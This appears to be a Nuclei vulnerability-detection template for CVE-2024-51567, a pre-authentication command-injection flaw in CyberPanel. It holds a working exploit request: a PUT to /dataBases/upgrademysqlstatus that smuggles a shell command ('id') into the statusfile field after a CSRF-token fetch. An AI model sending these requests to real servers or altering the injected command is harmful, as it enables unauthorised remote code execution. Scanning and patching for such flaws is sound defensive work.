id: CVE-2024-51567

info:
  name: CyberPanel v2.3.6 Pre-Auth Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: Attackers can exploit this vulnerability by crafting malicious requests that bypass authentication controls, allowing them to inject and execute arbitrary commands on the underlying server.
  reference:
    - https://community.cyberpanel.net/t/cyberpanel-2-1-remote-code-execution-rce/31760
    - https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
    - https://cwe.mitre.org/data/definitions/420.html
    - https://cwe.mitre.org/data/definitions/78.html
    - https://cyberpanel.net/KnowledgeBase/home/change-logs/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-51567
    cwe-id: CWE-306
    epss-score: 0.86725
    epss-percentile: 0.99716
    cpe: cpe:2.3:a:cyberpanel:cyberpanel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cyberpanel
    product: cyberpanel
    shodan-query: html:"CyberPanel"
  tags: cve,cve2024,cyberpanel,rce,intrusive,kev,vkev,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        PUT /dataBases/upgrademysqlstatus HTTP/1.1
        Host: {{Hostname}}
        X-CSRFToken: {{csrftoken}}
        Content-Type: application/json
        Referer: {{RootURL}}
        Cookie: csrftoken={{csrftoken}}

        {"statusfile":"/dev/null; id; #","csrftoken":"{{csrftoken}}"}

    extractors:
      - type: regex
        part: header
        name: csrftoken
        internal: true
        group: 1
        regex:
          - csrftoken=([A-Za-z0-9]+)

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "error_message"
          - "requestStatus"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bcba6b30e70ae550360ab54bdc8ea97e5b3cebb9ab7da3f1bb5e5f75618b58ef022021be0598c3050a747c71e9d8ba5ccaff95d4480577c9065857f04d090cbeccc7:922c64590222798bb761d5b6d8e72950